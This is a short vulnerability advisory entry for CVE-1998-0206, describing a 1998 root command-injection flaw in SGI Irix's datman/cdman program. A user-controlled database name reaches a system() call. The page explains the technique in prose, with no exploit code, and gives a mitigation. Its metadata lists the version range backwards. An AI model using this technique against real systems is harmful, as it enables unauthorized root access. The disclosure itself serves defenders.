vendor:
datman/cdman
by:
SecurityFocus
7.2
CVSS
HIGH
Arbitrary Command Execution
78
CWE
Product Name: datman/cdman
Affected Version From: Irix 6.2
Affected Version To: Irix 5.3
Patch Exists: YES
Related CWE: CVE-1998-0206
CPE: o:sgi:irix:6.2
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: Irix
1998
Arbitrary Command Execution
A vulnerability exists in the datman/cdman program, as included with Irix 6.2 and 5.3 from Silicon Graphics Inc. The vulnerability would allow arbitrary users to execute commands as root. The datman/cdman program will search for the existance of a .cdplayerrc in the users home directory. If it is found, and no .cddb directory is found, cdman will run the cddbcvt program. This program is invoked with the names of both the old and new databases via a system() call. Because of this, it is possible to substitute the names of the database with a command to be executed.
Mitigation:
Upgrade to a version of Irix 6.2 or 5.3 that is not vulnerable to this exploit.
